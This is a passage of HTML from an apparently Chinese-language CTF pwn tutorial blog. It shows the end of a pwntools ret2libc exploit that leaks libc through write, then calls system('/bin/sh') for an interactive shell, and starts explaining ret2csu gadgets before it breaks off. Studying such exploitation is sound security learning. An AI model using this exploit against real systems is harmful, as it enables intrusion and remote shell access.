<\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">4012b3<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">ret <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">40101a<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">a<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">*<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">100<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">=Triode=<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">pop_chain<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">0<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">0<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">1<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">1<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">write_got<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">100<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">write_got<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">+=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">mov_reg<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">a<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">*<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">38<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">main<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">sendlineafter<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">Input:<\/span><span style=\"color: #EBCB8B\">\\n<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> payload<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">write_real_addr <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">u64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">recvuntil<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #EBCB8B\">\\x7f<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">)&#91;<\/span><span style=\"color: #81A1C1\">-<\/span><span style=\"color: #B48EAD\">6<\/span><span style=\"color: #ECEFF4\">:&#93;.<\/span><span style=\"color: #88C0D0\">ljust<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">8<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #EBCB8B\">\\x00<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">))<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #88C0D0\">print<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">&#91;+&#93; the real address of write is<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">hex<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">write_real_addr<\/span><span style=\"color: #ECEFF4\">))<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">libc_base <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> write_real_addr <\/span><span style=\"color: #81A1C1\">-<\/span><span style=\"color: #D8DEE9FF\"> libc<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">sym<\/span><span style=\"color: #ECEFF4\">&#91;<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">write<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">&#93;<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #88C0D0\">print<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">&#91;+&#93; the base address of libc is<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">hex<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">libc_base<\/span><span style=\"color: #ECEFF4\">))<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">system <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> libc_base <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> libc<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">sym<\/span><span style=\"color: #ECEFF4\">&#91;<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">system<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">&#93;<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">sh <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> libc_base <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">next<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">libc<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">search<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">\/bin\/sh<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">))<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #88C0D0\">print<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">&#91;+&#93; the address of system is<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">hex<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">system<\/span><span style=\"color: #ECEFF4\">))<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #88C0D0\">print<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">&#91;+&#93; the address of \/bin\/sh is<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">hex<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">sh<\/span><span style=\"color: #ECEFF4\">))<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">a<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">*<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">100<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">=Triode=<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">pop_rdi<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">sh<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">system<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">ret<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">sendlineafter<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">Input:<\/span><span style=\"color: #EBCB8B\">\\n<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> payload<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">interactive<\/span><span style=\"color: #ECEFF4\">()<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>\uff08\u8fd9\u9898\u7ed9\u4e86<code>libc<\/code>\uff0c\u5c31\u4e0d\u7528\u6211\u4eec\u8fd9\u4e48\u8d39\u5fc3\u601d\u53bb\u627e\u4e86\uff09<\/p>\n\n\n\n<p>\u7ed3\u679c\u5982\u4e0b\uff1a<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-31.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-31.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"393\" height=\"396\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-31.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-164\"  sizes=\"auto, (max-width: 393px) 100vw, 393px\" \/><\/div><\/a><\/figure>\n<\/div>\n\n\n<h2 class=\"wp-block-heading\">ret2csu<\/h2>\n\n\n\n<p>\u572864\u4f4d\u7a0b\u5e8f\u4e2d\u5b58\u5728\u4e00\u6bb5\u4e07\u80fd\u7684gadgets\u4ee3\u7801\uff0c\u8fd9\u6bb5\u4ee3\u7801\u53ef\u4ee5\u63a7\u5236<code>rbx<\/code>,<code>rbp<\/code>,<code>r12<\/code>,<code>r13<\/code>,<code>r14<\/code>,<code>r15<\/code>,<code>rdx<\/code>,<code>rsi<\/code>\u53ca<code>edi<\/code>(<code>rdi<\/code>\u7684\u4f4e32\u4f4d)\uff0c\u540c\u65f6\u53ef\u4ee5<code>call<\/code>\u6307\u5b9a\u7684\u5730\u5740\uff0c\u800c\u8fd9\u6bb5\u4ee3\u7801\u5b58\u5728\u4e8e<code>__libc_csu_init<\/code>\uff08\u7528\u4e8e\u52a8\u6001\u94fe\u63a5\u7684\u7a0b\u5e8f\u4e2d\u5bf9libc\u7684\u521d\u59cb\u5316\uff09\u8fd9\u4e2a\u51fd\u6570\u4e4b\u4e2d\uff0c\u8fd9\u4e2a\u51fd\u6570\u7684\u6c47\u7f16\u4ee3\u7801\u5982\u4e0b\uff08\u622a\u53d6\u81ea\u67d0\u9053\u9898\u76ee\u7684\u6c47\u7f16\u4ee3\u7801\uff09\uff1a<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-32.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-32.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"732\" height=\"612\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-32.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-165\"  sizes=\"auto, (max-width: 732px) 100vw, 732px\" \/><\/div><\/a><\/figure>\n<\/div>\n\n\n<p>\u503c\u5f97\u6211\u4eec\u6ce8\u610f\u7684\u6709\u4e24\u6bb5\uff1a<\/p>\n\n\n\n<p>\u7b2c\u4e00\u6bb5\uff08\u8bb0\u4e3acsu1\uff09\u4e3a\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>mov     rdx, r14\nmov     rsi, r13\nmov     edi, r12d\ncall    ds:(__frame_dummy_init_array_entry - 403E10h)&#91;r15+rbx*8&#93;\nadd     rbx, 1\ncmp     rbp, rbx\njnz     short loc_401290<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #81A1C1\">mov<\/span><span style=\"color: #D8DEE9FF\">     <\/span><span style=\"color: #81A1C1\">rdx<\/span><span style=\"color: #D8DEE9FF\">, <\/span><span style=\"color: #81A1C1\">r14<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">mov<\/span><span style=\"color: #D8DEE9FF\">     <\/span><span style=\"color: #81A1C1\">rsi<\/span><span style=\"color: #D8DEE9FF\">, <\/span><span style=\"color: #81A1C1\">r13<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">mov<\/span><span style=\"color: #D8DEE9FF\">     <\/span><span style=\"color: #81A1C1\">edi<\/span><span style=\"color: #D8DEE9FF\">, <\/span><span style=\"color: #81A1C1\">r12d<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">call<\/span><span style=\"color: #D8DEE9FF\">    <\/span><span style=\"color: #81A1C1\">ds<\/span><span style=\"color: #D8DEE9FF\">:(__frame_dummy_init_array_entry - <\/span><span style=\"color: #B48EAD\">403E10h<\/span><span style=\"color: #D8DEE9FF\">)&#91;<\/span><span style=\"color: #81A1C1\">r15<\/span><span style=\"color: #D8DEE9FF\">+<\/span><span style=\"color: #81A1C1\">rbx<\/span><span style=\"color: #D8DEE9FF\">*<\/span><span style=\"color: #B48EAD\">8<\/span><span style=\"color: #D8DEE9FF\">&#93;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">add<\/span><span style=\"color: #D8DEE9FF\">     <\/span><span style=\"color: #81A1C1\">rbx<\/span><span style=\"color: #D8DEE9FF\">, <\/span><span style=\"color: #B48EAD\">1<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">cmp<\/span><span style=\"color: #D8DEE9FF\">     <\/span><span style=\"color: #81A1C1\">rbp<\/span><span style=\"color: #D8DEE9FF\">, <\/span><span style=\"color: #81A1C1\">rbx<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">jnz<\/span><span style=\"color: #D8DEE9FF\">     short loc_401290<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>\u524d\u4e09\u884c\u5206\u522b\u8868\u793a\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u5c06\u5bc4\u5b58\u5668<code>r14<\/code>\u7684\u503c\u8d4b\u7ed9<code>rdx<\/code><\/li>\n\n\n\n<li>\u5c06\u5bc4\u5b58\u5668<code>r13<\/code>\u7684\u503c\u8d4b\u7ed9<code>rsi<\/code><\/li>\n\n\n\n<li>\u5c06\u5bc4\u5b58\u5668<code>r12<\/code>\u7684\u4f4e32\u4f4d\u7684\u503c\u8d4b\u7ed9<code>edi<\/code>\uff08<code>rdi<\/code>\u7684\u4f4e32\u4f4d\uff09<\/li>\n<\/ol>\n\n\n\n<p>\u540e\u9762\u4e00\u884c\uff08<code>ds:(__frame_dummy_init_array_entry - 403E10h)[r15+rbx*8]<\/code>\uff09\u4f1a\u8c03\u7528<code>r15+rbx*8<\/code>\u6307\u5411\u7684\u51fd\u6570\uff08\u503c\u5f97\u6ce8\u610f\u7684\u662f\uff0c\u6709\u65f6\u5019<code>r12<\/code>\u4f1a\u4e0e<code>r15<\/code>\u7684\u7528\u6cd5\u5bf9\u8c03\uff09\uff1b\u6700\u540e\u4e09\u884c\u5219\u8868\u793a\u5c06<code>rbx+1<\/code>\u4e0e<code>rbp<\/code>\u8fdb\u884c\u6bd4\u8f83\uff0c\u82e5\u4e0d\u76f8\u7b49\u5219\u4f1a\u91cd\u590d\u6267\u884c\u8fd9\u4e00\u6bb5\u6bb5\u6c47\u7f16\u4ee3\u7801\uff0c\u5728\u4e00\u822c\u5229\u7528\u7684\u65f6\u5019\uff0c\u6211\u4eec\u4f1a\u4ee4<code>rbx<\/code>\u7b49\u4e8e0\uff0c\u800c<code>rbp<\/code>\u7b49\u4e8e1\uff0c\u8fd9\u65e2\u80fd\u76f4\u63a5\u8c03\u7528<code>r15<\/code>\u6307\u5411\u7684\u51fd\u6570\uff0c\u4e5f\u80fd\u901a\u8fc7\u8fd9\u4e2a\u6bd4\u8f83.<\/p>\n\n\n\n<p>\u800c\u503c\u5f97\u6ce8\u610f\u7684\u7b2c\u4e8c\u6bb5\uff08\u8bb0\u4e3acsu2\uff09\u4e3a\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>add     rsp, 8\npop     rbx\npop     rbp\npop     r12\npop     r13\npop     r14\npop     r15\nretn<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: 